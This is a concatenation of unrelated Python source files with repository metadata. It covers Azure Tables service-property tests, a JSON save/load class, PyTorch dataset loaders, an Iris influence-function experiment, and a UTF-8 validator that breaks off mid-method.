unittest.TextTestRunner().run(suite)
|
[
"caviler@gmail.com"
] |
caviler@gmail.com
|
bb7d789c7df59f3ef3d4b7d31cc5b89a64bbb3c6
|
51cbd904e17e45f6adb5303c3532a6ff0519ab42
|
/sdk/tables/azure-data-tables/tests/test_table_service_properties_cosmos.py
|
139f3c1973a4a4d8f57e5f7f63813ae8c7bfbeef
|
[
"LicenseRef-scancode-generic-cla",
"MIT",
"LGPL-2.1-or-later"
] |
permissive
|
heaths/azure-sdk-for-python
|
203e9a6052d7dff5b5f2346bced86b9406be3419
|
77feaf14471eba6642f5c7ae2f3f06981ff361d7
|
refs/heads/master
| 2022-07-26T06:46:57.067502
| 2021-04-15T21:35:26
| 2021-04-15T21:35:26
| 239,629,447
| 0
| 0
|
MIT
| 2020-02-10T22:46:20
| 2020-02-10T22:46:19
| null |
UTF-8
|
Python
| false
| false
| 9,896
|
py
|
# coding: utf-8
# -------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
# --------------------------------------------------------------------------
import time
import pytest
from devtools_testutils import AzureTestCase
from azure.core.exceptions import HttpResponseError
from azure.data.tables import (
TableServiceClient,
TableAnalyticsLogging,
Metrics,
RetentionPolicy,
CorsRule
)
from _shared.testcase import TableTestCase
from preparers import CosmosPreparer
# ------------------------------------------------------------------------------
# Delay (seconds) used by the live-test sleeps below. SLEEP_DELAY was referenced
# but never defined in this module; 30 is an assumed value matching the explicit
# time.sleep(30) call elsewhere in this file.
SLEEP_DELAY = 30
class TableServicePropertiesTest(AzureTestCase, TableTestCase):
# --Helpers-----------------------------------------------------------------
def _assert_properties_default(self, prop):
assert prop is not None
self._assert_logging_equal(prop['analytics_logging'], TableAnalyticsLogging())
self._assert_metrics_equal(prop['hour_metrics'], Metrics())
self._assert_metrics_equal(prop['minute_metrics'], Metrics())
self._assert_cors_equal(prop['cors'], list())
def _assert_logging_equal(self, log1, log2):
if log1 is None or log2 is None:
assert log1 == log2
return
assert log1.version == log2.version
assert log1.read == log2.read
assert log1.write == log2.write
assert log1.delete == log2.delete
self._assert_retention_equal(log1.retention_policy, log2.retention_policy)
def _assert_delete_retention_policy_equal(self, policy1, policy2):
if policy1 is None or policy2 is None:
assert policy1 == policy2
return
assert policy1.enabled == policy2.enabled
assert policy1.days == policy2.days
def _assert_static_website_equal(self, prop1, prop2):
if prop1 is None or prop2 is None:
assert prop1 == prop2
return
assert prop1.enabled == prop2.enabled
assert prop1.index_document == prop2.index_document
assert prop1.error_document404_path == prop2.error_document404_path
def _assert_delete_retention_policy_not_equal(self, policy1, policy2):
if policy1 is None or policy2 is None:
assert policy1 != policy2
return
assert not (policy1.enabled == policy2.enabled and policy1.days == policy2.days)
def _assert_metrics_equal(self, metrics1, metrics2):
if metrics1 is None or metrics2 is None:
assert metrics1 == metrics2
return
assert metrics1.version == metrics2.version
assert metrics1.enabled == metrics2.enabled
assert metrics1.include_apis == metrics2.include_apis
self._assert_retention_equal(metrics1.retention_policy, metrics2.retention_policy)
def _assert_cors_equal(self, cors1, cors2):
if cors1 is None or cors2 is None:
assert cors1 == cors2
return
assert len(cors1) == len(cors2)
for i in range(0, len(cors1)):
rule1 = cors1[i]
rule2 = cors2[i]
assert len(rule1.allowed_origins) == len(rule2.allowed_origins)
assert len(rule1.allowed_methods) == len(rule2.allowed_methods)
assert rule1.max_age_in_seconds == rule2.max_age_in_seconds
assert len(rule1.exposed_headers) == len(rule2.exposed_headers)
assert len(rule1.allowed_headers) == len(rule2.allowed_headers)
def _assert_retention_equal(self, ret1, ret2):
assert ret1.enabled == ret2.enabled
assert ret1.days == ret2.days
# --Test cases per service ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_table_service_properties(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
# Act
resp = tsc.set_service_properties(
analytics_logging=TableAnalyticsLogging(),
hour_metrics=Metrics(),
minute_metrics=Metrics(),
cors=list())
# Assert
assert resp is None
self._assert_properties_default(tsc.get_service_properties())
if self.is_live:
            time.sleep(SLEEP_DELAY)
# --Test cases per feature ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_logging(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
logging = TableAnalyticsLogging(read=True, write=True, delete=True, retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(analytics_logging=logging)
# Assert
received_props = tsc.get_service_properties()
self._assert_logging_equal(received_props['analytics_logging'], logging)
if self.is_live:
time.sleep(30)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_hour_metrics(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
hour_metrics = Metrics(enabled=True, include_apis=True, retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(hour_metrics=hour_metrics)
# Assert
received_props = tsc.get_service_properties()
self._assert_metrics_equal(received_props['hour_metrics'], hour_metrics)
if self.is_live:
            time.sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_minute_metrics(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
minute_metrics = Metrics(enabled=True, include_apis=True,
retention_policy=RetentionPolicy(enabled=True, days=5))
# Act
tsc.set_service_properties(minute_metrics=minute_metrics)
# Assert
received_props = tsc.get_service_properties()
self._assert_metrics_equal(received_props['minute_metrics'], minute_metrics)
if self.is_live:
            time.sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_set_cors(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
url = self.account_url(tables_cosmos_account_name, "cosmos")
tsc = TableServiceClient(url, tables_primary_cosmos_account_key)
cors_rule1 = CorsRule(['www.xyz.com'], ['GET'])
allowed_origins = ['www.xyz.com', "www.ab.com", "www.bc.com"]
allowed_methods = ['GET', 'PUT']
max_age_in_seconds = 500
exposed_headers = ["x-ms-meta-data*", "x-ms-meta-source*", "x-ms-meta-abc", "x-ms-meta-bcd"]
allowed_headers = ["x-ms-meta-data*", "x-ms-meta-target*", "x-ms-meta-xyz", "x-ms-meta-foo"]
cors_rule2 = CorsRule(
allowed_origins,
allowed_methods,
max_age_in_seconds=max_age_in_seconds,
exposed_headers=exposed_headers,
allowed_headers=allowed_headers)
cors = [cors_rule1, cors_rule2]
# Act
tsc.set_service_properties(cors=cors)
# Assert
received_props = tsc.get_service_properties()
self._assert_cors_equal(received_props['cors'], cors)
if self.is_live:
            time.sleep(SLEEP_DELAY)
# --Test cases for errors ---------------------------------------
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_too_many_cors_rules(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
tsc = TableServiceClient(self.account_url(tables_cosmos_account_name, "cosmos"), tables_primary_cosmos_account_key)
cors = []
for i in range(0, 6):
cors.append(CorsRule(['www.xyz.com'], ['GET']))
# Assert
pytest.raises(HttpResponseError,
tsc.set_service_properties, None, None, None, cors)
if self.is_live:
            time.sleep(SLEEP_DELAY)
@pytest.mark.skip("Cosmos Tables does not yet support service properties")
@CosmosPreparer()
def test_retention_too_long(self, tables_cosmos_account_name, tables_primary_cosmos_account_key):
# Arrange
tsc = TableServiceClient(self.account_url(tables_cosmos_account_name, "cosmos"), tables_primary_cosmos_account_key)
minute_metrics = Metrics(enabled=True, include_apis=True,
retention_policy=RetentionPolicy(enabled=True, days=366))
# Assert
pytest.raises(HttpResponseError,
tsc.set_service_properties,
None, None, minute_metrics)
if self.is_live:
            time.sleep(SLEEP_DELAY)
class TestTableUnitTest(TableTestCase):
def test_retention_no_days(self):
# Assert
pytest.raises(ValueError, RetentionPolicy, True, None)
|
[
"noreply@github.com"
] |
heaths.noreply@github.com
|
6b6eff5bda3cf3377e02463065468ac0476d1bf8
|
38ecc2e4d128f2770c105673fba2c480a96d688f
|
/Задание №1 по наследованию.py
|
a44643ebcea89a7b2241ab2fc0a27647c14c4a1a
|
[] |
no_license
|
Valentin31121967/Class-
|
288c4b2cf430bcb1b6c3dd756d0040867125b2f9
|
078ab77356e9d6b7532622a2d32c5ea29fb7ffcb
|
refs/heads/master
| 2022-04-15T05:09:11.094751
| 2020-04-15T04:45:29
| 2020-04-15T04:45:29
| 255,808,474
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,352
|
py
|
# Task No. 1. Take the exercise from the previous lecture and move the save and load functions into a separate class
import json
# Create a new class User
class User:
    # Constructor of the User class
    def __init__(self):
self.first_name = None
self.middle_name = None
self.last_name = None
self.age = None
    # Reads the user's data from keyboard input
def input_info(self):
self.first_name = input("Input First Name: ")
self.middle_name = input("Input Middle Name: ")
self.last_name = input("Input Last Name: ")
self.age = input("Input Age: ")
    # Serializes the data into a form convenient for on-screen reading
def serialize(self):
return "First name: {}\n" \
"Middle name: {}\n"\
"Last name: {}\n" \
"Age : {}\n"\
.format(self.first_name, self.middle_name, self.last_name, self.age)
# Create a child class Save_load_data(User)
class Save_load_data(User):
    # Writes the data to a separate file
    def fail_save(self):
        fil = str(input("Enter the file name for saving to disk: "))
with open(fil, "w") as f:
data = {"first_name": self.first_name,
"middle_name": self.middle_name,
"last_name": self.last_name,
"age": self.age}
json.dump(data, f)
    # Loads the data from a separate file
    def fail_load(self):
        fil = str(input("Enter the file name for loading from disk: "))
with open(fil, "r") as f:
data = json.loads(f.read())
self.first_name = data["first_name"]
self.last_name = data["last_name"]
self.middle_name = data["middle_name"]
self.age = data["age"]
print(data)
user = Save_load_data()
user.input_info()
print(user.serialize())
print(user.fail_save())
print(user.fail_load())
print(user)
|
[
"askshatriy@ukr.net"
] |
askshatriy@ukr.net
|
61496518c7782cbc99ab59bb0f240368c572137d
|
6fda3d57556c381de407898710b02244561ffa4e
|
/load_datasets.py
|
c6bd1af889b12f860b070b4aeab2aaf412827bd7
|
[] |
no_license
|
pachecobeto95/Quality_POPEX
|
46679f7319aff44675b3ec41be2a4551a611e3d4
|
e98987c5ff8836723ef227c685dcd7d10363522b
|
refs/heads/master
| 2023-03-31T04:11:29.868823
| 2021-04-03T19:17:35
| 2021-04-03T19:17:35
| 335,408,076
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,288
|
py
|
import torch
import torchvision.transforms as transforms
from torchvision import datasets
from torch.utils.data import Dataset, DataLoader, random_split, SubsetRandomSampler
class LoadDataset():
def __init__(self, input_dim, batch_size_train, batch_size_test):
self.input_dim = input_dim
self.batch_size_train = batch_size_train
self.batch_size_test = batch_size_test
self.transformation_list = transforms.Compose([transforms.Resize(input_dim),
transforms.CenterCrop(input_dim),
transforms.ToTensor()])
def cifar_10(self):
# Load Cifar-10 dataset
root = "cifar_10"
trainset = datasets.CIFAR10(root=root, train=True, download=True,
transform=transforms.Compose(self.transformation_list))
trainLoader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size_train,
num_workers=2, shuffle=True, drop_last=True)
testset = datasets.CIFAR10(root=root, train=False, download=True,
transform=transforms.Compose(self.transformation_list))
testLoader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size_test, num_workers=2, shuffle=False)
return trainLoader, testLoader
def cifar_100(self):
# Load Cifar-100 dataset
root = "cifar_100"
trainset = datasets.CIFAR100(root=root, train=True, download=True,
transform=transforms.Compose(self.transformation_list))
trainLoader = torch.utils.data.DataLoader(trainset, batch_size=self.batch_size_train,
num_workers=2, shuffle=True, drop_last=True)
testset = datasets.CIFAR100(root=root, train=False, download=True,
transform=transforms.Compose(self.transformation_list))
testLoader = torch.utils.data.DataLoader(testset, batch_size=self.batch_size_test, num_workers=2, shuffle=False)
return trainLoader, testLoader
def imageNet(self, root_path):
# Load ImageNet Dataset
test_dataset = datasets.ImageFolder(root = root_path, transform = self.transformation_list)
_, val_dataset = random_split(test_dataset, (0, 50000))
val_loader = DataLoader(dataset=val_dataset, shuffle=False, batch_size=self.batch_size_test)
return None, val_loader
def caltech(self, root_path, split_train=0.8):
dataset = datasets.ImageFolder(root = root_path, transform = self.transformation_list)
train_size = int(split_train*len(dataset))
test_size = len(dataset) - train_size
train_dataset, test_dataset = random_split(dataset, (train_size, test_size))
train_dataset, val_dataset = random_split(train_dataset, (int(split_train*len(train_dataset)), len(train_dataset) - int(split_train*len(train_dataset))))
train_loader = DataLoader(dataset=train_dataset, shuffle=True, batch_size=self.batch_size_train)
val_loader = DataLoader(dataset=val_dataset, shuffle=False, batch_size=self.batch_size_test)
test_loader = DataLoader(dataset=test_dataset, shuffle=False, batch_size=self.batch_size_test)
return train_loader, val_loader, test_loader
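# Minimal usage sketch (argument values are illustrative, not from this module):
#   loader = LoadDataset(input_dim=224, batch_size_train=64, batch_size_test=100)
#   train_loader, test_loader = loader.cifar_10()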
|
[
"robertopvc@gmail.com"
] |
robertopvc@gmail.com
|
07668772edfbe22ce75606f7b2dbddeeadeb083a
|
efcd8ea3f5419cd7d6eb7406875b7f727291492f
|
/IRIS/width_wise_l2/8w_l2.py
|
46704866ad62a1cdd2b0e5d8b54f553a21f127d6
|
[
"MIT"
] |
permissive
|
jrepifano/xai_is_fragile
|
936612c2ecf7b020ab1a75719d18bff9bed564d2
|
fd7e21355582543fa2d00bf9f48d3e12725c3fb6
|
refs/heads/main
| 2023-08-28T00:45:36.066073
| 2021-11-13T20:12:51
| 2021-11-13T20:12:51
| 346,057,518
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,542
|
py
|
import os
import time
import torch
import numpy as np
from pyhessian import hessian
from sklearn.datasets import load_iris
from sklearn.metrics import accuracy_score
from scipy.stats import pearsonr, spearmanr
from sklearn.model_selection import LeaveOneOut
from sklearn.preprocessing import StandardScaler
os.environ["CUDA_DEVICE_ORDER"] = 'PCI_BUS_ID'
os.environ["CUDA_VISIBLE_DEVICES"] = '3'
# Random Seed - Negating the randomizing effect
np.random.seed(6)
# Seeds : 2, 5, 10, 13, 15, 20
# Random seed for torch
torch.manual_seed(14)
class Model(torch.nn.Module):
def __init__(self, n_feats, n_nodes, n_classes):
super(Model, self).__init__()
self.lin1 = torch.nn.Linear(n_feats, n_nodes)
self.lin_last = torch.nn.Linear(n_nodes, n_classes)
self.relu = torch.nn.SELU()
def forward(self, x):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x = torch.tensor(x, requires_grad=True, device=device, dtype=torch.float32)
x = self.relu(self.lin1(x))
x = self.lin_last(x)
return x
def bottleneck(self, x):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x = torch.tensor(x, requires_grad=True, device=device, dtype=torch.float32)
x = self.relu(self.lin1(x))
return x
def fit(self, x, y, no_epochs=1000):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss()
optimizer = torch.optim.Adam(self.parameters(), lr=1e-3, weight_decay=0.005)
scheduler = torch.optim.lr_scheduler.ReduceLROnPlateau(optimizer, patience=100, verbose=False)
for epoch in range(no_epochs):
optimizer.zero_grad()
logits = self.forward(x)
loss = criterion(logits, y)
loss.backward()
optimizer.step()
scheduler.step(loss.item())
def score(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
logits = torch.nn.functional.softmax(self.forward(x), dim=1)
score = torch.sum(torch.argmax(logits, dim=1) == y)/len(x)
return score.cpu().numpy()
def get_indiv_loss(self, x, y):
device = 'cuda:0' if next(self.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss(reduction='none')
logits = self.forward(x)
loss = criterion(logits, y)
return [l.item() for l in loss] if len(loss) > 1 else loss.item()
class influence_wrapper:
def __init__(self, model, x_train, y_train, x_test=None, y_test=None):
self.x_train = x_train
self.y_train = y_train
self.x_test = x_test
self.y_test = y_test
self.model = model
self.device = 'cuda:0' if next(self.model.parameters()).is_cuda else 'cpu'
def get_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_train[self.pointer].reshape(1, -1))
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor([self.y_train[self.pointer]], device=self.device))
return loss
def get_train_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_train)
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor(self.y_train, device=self.device))
return loss
def get_test_loss(self, weights):
criterion = torch.nn.CrossEntropyLoss()
logits = self.model.bottleneck(self.x_test.reshape(1, -1))
logits = logits @ weights.T + self.model.lin_last.bias
loss = criterion(logits, torch.tensor(self.y_test, device=self.device))
return loss
def get_hessian(self, weights):
dim_1, dim_2 = weights.shape[0], weights.shape[1]
H_i = torch.zeros((dim_1, dim_2, dim_1, dim_2), device=self.device)
for i in range(len(self.x_train)):
self.pointer = i
H_i += torch.autograd.functional.hessian(self.get_loss, weights, vectorize=True)
H = H_i / len(self.x_train)
square_size = int(np.sqrt(torch.numel(H)))
H = H.view(square_size, square_size)
return H
def LiSSA(self, v, weights):
count = 0
cur_estimate = v
damping = 0
scale = 10
num_samples = len(self.x_train)
prev_norm = 1
diff = prev_norm
ihvp = None
for i in range(len(self.x_train)):
self.pointer = i
while diff > 0.00001 and count < 10000:
hvp = torch.autograd.functional.hvp(self.get_train_loss, weights, cur_estimate)[1]
cur_estimate = [a + (1 - damping) * b - c / scale for (a, b, c) in zip(v, cur_estimate, hvp)]
cur_estimate = torch.squeeze(torch.stack(cur_estimate)) # .view(1, -1)
numpy_est = cur_estimate.detach().cpu().numpy()
numpy_est = numpy_est.reshape(1, -1)
count += 1
diff = abs(np.linalg.norm(np.concatenate(numpy_est)) - prev_norm)
prev_norm = np.linalg.norm(np.concatenate(numpy_est))
if ihvp is None:
ihvp = [b/scale for b in cur_estimate]
else:
ihvp = [a + b/scale for (a, b) in zip(ihvp, cur_estimate)]
ihvp = torch.squeeze(torch.stack(ihvp))
ihvp = [a / num_samples for a in ihvp]
ihvp = torch.squeeze(torch.stack(ihvp))
return ihvp.detach()
def i_up_params(self, weights, idx, estimate=False):
i_up_params = list()
if estimate:
for i in idx:
self.pointer = i
grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_params.append(self.LiSSA(torch.autograd.functional.hvp(self.get_train_loss, weights, grad)[1], weights).detach().cpu().numpy())
else:
H = self.get_hessian(self.model.lin_last.weight)
H_inv = torch.inverse(H)
for i in idx:
self.pointer = i
grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
orig_shape = grad.shape
i_up_params.append((H_inv @ grad.float().view(-1, 1)).view(orig_shape).detach().cpu().numpy())
return i_up_params
def i_up_loss(self, weights, idx, estimate=False):
i_up_loss = list()
test_grad = torch.autograd.grad(self.get_test_loss(weights), weights)[0]
if estimate:
for i in idx:
self.pointer = i
train_grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_loss.append((test_grad.view(1, -1) @ self.LiSSA(torch.autograd.functional.hvp(self.get_train_loss,
weights, train_grad)[1], weights).view(-1, 1)).detach().cpu().numpy()[0][0])
else:
H = self.get_hessian(weights)
H_inv = torch.inverse(H)
for i in idx:
self.pointer = i
train_grad = torch.autograd.grad(self.get_loss(weights), weights)[0]
i_up_loss.append((test_grad.view(1, -1) @ (H_inv @ train_grad.float().view(-1, 1))).item())
return i_up_loss
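# For reference (sketch, not part of the original file): i_up_loss above is, up
# to sign, the influence-function estimate of Koh & Liang (2017),
#   I_up,loss(z, z_test) ~ grad L(z_test)^T H^{-1} grad L(z),
# restricted to the last-layer weights, where H is the Hessian of the mean
# training loss. exact_difference() further below retrains the model to obtain
# the ground-truth loss change this estimate is compared against.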
def get_hessian_info(model, x, y):
device = 'cuda:0' if next(model.parameters()).is_cuda else 'cpu'
if not torch.is_tensor(x):
x, y = torch.from_numpy(x).float().to(device), torch.from_numpy(y).long().to(device)
criterion = torch.nn.CrossEntropyLoss()
hessian_comp = hessian(model, criterion, data=(x, y), cuda=True)
top_eigenvalues, top_eigenvector = hessian_comp.eigenvalues()
return top_eigenvalues[-1]
def find_max_loss():
x, y = load_iris(return_X_y=True)
loo = LeaveOneOut()
train_acc, test_loss, y_pred = list(), list(), list()
for train_index, test_index in loo.split(x):
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.fit(x_train, y_train)
train_acc.append(model.score(x_train, y_train))
test_loss.append(model.get_indiv_loss(x_test, y_test))
y_pred.append(torch.argmax(torch.nn.functional.softmax(model(x_test), dim=1)).item())
train_acc = np.mean(train_acc)
test_acc = accuracy_score(y, y_pred)
max_loss = np.argmax(test_loss)
return max_loss, train_acc, test_acc
def find_top_train(max_loss=83):
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.fit(x_train, y_train, 60000)
train_acc = model.score(x_train, y_train)
train_loss = model.get_indiv_loss(x_train, y_train)
    to_look = int(1/6 * (len(x) - 1))
top_train = np.argsort(train_loss)[::-1][:to_look]
top_eig = get_hessian_info(model, x_train, y_train)
torch.save(model.state_dict(), 'loo_params_8w.pt')
return top_train, model, top_eig, train_acc
def exact_difference(model, top_train, max_loss):
exact_loss_diff = list()
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
true_loss = model.get_indiv_loss(x_test, y_test)
for i in top_train:
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
x_train, y_train = np.delete(x_train, i, 0), np.delete(y_train, i, 0)
model = Model(x.shape[1], 8, 3).to('cuda:0')
model.load_state_dict(torch.load('loo_params_8w.pt'))
model.fit(x_train, y_train, 7500)
exact_loss_diff.append(model.get_indiv_loss(x_test, y_test) - true_loss)
return exact_loss_diff
def approx_difference(model, top_train, max_loss):
model.load_state_dict(torch.load('loo_params_8w.pt'))
x, y = load_iris(return_X_y=True)
train_index = np.hstack((np.arange(max_loss), np.arange(max_loss + 1, len(x))))
test_index = np.asarray([max_loss])
x_train, x_test = x[train_index], x[test_index]
y_train, y_test = y[train_index], y[test_index]
scaler = StandardScaler().fit(x_train)
x_train, x_test = scaler.transform(x_train), scaler.transform(x_test)
infl = influence_wrapper(model, x_train, y_train, x_test, y_test)
approx_loss_diff = np.asarray(infl.i_up_loss(model.lin_last.weight, top_train, estimate=False))
return approx_loss_diff
def main():
outer_start_time = time.time()
train, eig, pearson, spearman = list(), list(), list(), list()
for i in range(1):
start_time = time.time()
# max_loss, train_acc, test_acc = find_max_loss() # 83 is always the highest loss then 133, 70, 77
# print('Done max loss')
max_loss = 83
top_train, model, top_eig, train_acc = find_top_train(max_loss)
print('Done top train')
exact_loss_diff = exact_difference(model, top_train, max_loss)
print('Done Exact Diff')
approx_loss_diff = approx_difference(model, top_train, max_loss)
train.append(train_acc)
eig.append(top_eig)
pearson.append(pearsonr(exact_loss_diff, approx_loss_diff)[0])
spearman.append(spearmanr(exact_loss_diff, approx_loss_diff)[0])
print('Done {}/{} in {:.2f} minutes'.format(i+1, 10, (time.time()-start_time)/60))
if i % 10 == 0:
np.save('figure1/det_8w_l2_train.npy', train)
np.save('figure1/det_8w_l2_eig.npy', eig)
np.save('figure1/det_8w_l2_pearson.npy', pearson)
np.save('figure1/det_8w_l2_spearman.npy', spearman)
np.save('figure1/det_8w_l2_train.npy', train)
np.save('figure1/det_8w_l2_eig.npy', eig)
np.save('figure1/det_8w_l2_pearson.npy', pearson)
np.save('figure1/det_8w_l2_spearman.npy', spearman)
print('Finished Iter in {:.2f} minutes'.format((time.time()-outer_start_time)/60))
pass
if __name__ == '__main__':
main()
|
[
"jrepifano@gmail.com"
] |
jrepifano@gmail.com
|
43a1a88455943cde239ee14c15fa12fc73f1c4f9
|
3cf5638a12bb6a03a40aaffcab15b1789546948d
|
/ws4py/utf8validator.py
|
b457768a61646dc7cb6de895077c599b37bfe646
|
[] |
no_license
|
GDur/LiveProcessingJs
|
8afeed64777d1df977967856f2c8b592ff671438
|
7b2c5a0e4cee0926a8c289e297cdb470a7fe48b2
|
refs/heads/master
| 2016-09-06T07:55:21.240721
| 2012-12-08T11:14:19
| 2012-12-08T11:14:19
| 6,513,730
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,283
|
py
|
# coding=utf-8
###############################################################################
##
## Copyright 2011 Tavendo GmbH
##
## Note:
##
## This code is a Python implementation of the algorithm
##
## "Flexible and Economical UTF-8 Decoder"
##
## by Bjoern Hoehrmann
##
## bjoern@hoehrmann.de
## http://bjoern.hoehrmann.de/utf-8/decoder/dfa/
##
## Licensed under the Apache License, Version 2.0 (the "License");
## you may not use this file except in compliance with the License.
## You may obtain a copy of the License at
##
## http://www.apache.org/licenses/LICENSE-2.0
##
## Unless required by applicable law or agreed to in writing, software
## distributed under the License is distributed on an "AS IS" BASIS,
## WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
## See the License for the specific language governing permissions and
## limitations under the License.
##
###############################################################################
class Utf8Validator:
"""
Incremental UTF-8 validator with constant memory consumption (minimal state).
Implements the algorithm "Flexible and Economical UTF-8 Decoder" by
Bjoern Hoehrmann (http://bjoern.hoehrmann.de/utf-8/decoder/dfa/).
"""
## DFA transitions
UTF8VALIDATOR_DFA = [
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 00..1f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 20..3f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 40..5f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, # 60..7f
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9, # 80..9f
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7, # a0..bf
8,8,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2, # c0..df
0xa,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x4,0x3,0x3, # e0..ef
0xb,0x6,0x6,0x6,0x5,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8, # f0..ff
0x0,0x1,0x2,0x3,0x5,0x8,0x7,0x1,0x1,0x1,0x4,0x6,0x1,0x1,0x1,0x1, # s0..s0
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1, # s1..s2
1,2,1,1,1,1,1,2,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1, # s3..s4
1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,3,1,3,1,1,1,1,1,1, # s5..s6
1,3,1,1,1,1,1,3,1,3,1,1,1,1,1,1,1,3,1,1,1,1,1,1,1,1,1,1,1,1,1,1, # s7..s8
]
UTF8_ACCEPT = 0
UTF8_REJECT = 1
def __init__(self):
self.reset()
def decode(self, b):
"""
Eat one UTF-8 octet, and validate on the fly.
Returns UTF8_ACCEPT when enough octets have been consumed, in which case
self.codepoint contains the decoded Unicode code point.
Returns UTF8_REJECT when invalid UTF-8 was encountered.
Returns some other positive integer when more octets need to be eaten.
"""
type = Utf8Validator.UTF8VALIDATOR_DFA[b]
if self.state != Utf8Validator.UTF8_ACCEPT:
self.codepoint = (b & 0x3f) | (self.codepoint << 6)
else:
self.codepoint = (0xff >> type) & b
self.state = Utf8Validator.UTF8VALIDATOR_DFA[256 + self.state * 16 + type]
return self.state
def reset(self):
"""
